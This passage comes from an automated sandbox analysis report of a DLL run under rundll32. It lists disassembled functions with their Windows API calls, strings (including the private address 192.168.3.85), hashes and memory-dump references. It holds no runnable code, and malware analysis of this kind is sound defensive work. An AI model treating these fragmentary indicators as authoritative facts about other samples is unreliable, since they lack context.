                                                                                                                          • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                          • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                          • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                          • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                          • String ID: System
                                                                                                                          • API String ID: 1529587224-3470857405
                                                                                                                          • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                          • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                          • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                          • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                          • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                          • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                          • API String ID: 2418878492-2500072749
                                                                                                                          • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                          • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                          • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                          • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                          • _memset.LIBCMT ref: 1001579D
                                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                          • LoadBitmapA.USER32 ref: 10015807
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                                          • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                          • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                          • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                          • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                          • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                          • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2429671754-3916222277
                                                                                                                          • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                          • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                          • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                          • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                          • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                          • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                                          • String ID: B$DISPLAY
                                                                                                                          • API String ID: 3136151823-3316187204
                                                                                                                          • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                          • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                          • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                          • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Edit
                                                                                                                          • API String ID: 0-554135844
                                                                                                                          • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                          • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                          • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                          • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                          • SendMessageA.USER32 ref: 10023CD9
                                                                                                                          • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                          • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                          • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 187318432-0
                                                                                                                          • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                          • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                          • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                          • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                            • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 69039007-0
                                                                                                                          • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                          • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                          • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                          • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                          • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                            • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                            • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDevice$Mode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 696222070-0
                                                                                                                          • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                          • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                          • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                          • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                          • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                            • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                            • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDevice$Mode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 696222070-0
                                                                                                                          • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                          • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                          • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                          • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                          • _memset.LIBCMT ref: 10020424
                                                                                                                          • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 289641511-0
                                                                                                                          • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                          • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                          • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                          • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                            • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                            • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                            • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                            • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                          • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                            • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                          • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                          • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2731880238-0
                                                                                                                          • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                          • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                          • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                          • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                          • SetWindowLongA.USER32 ref: 10012989
                                                                                                                            • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LongMenuWindow$AppendSystem
                                                                                                                          • String ID: 192.168.3.85$Message
                                                                                                                          • API String ID: 4121476972-856608562
                                                                                                                          • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                          • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                          • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                          • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

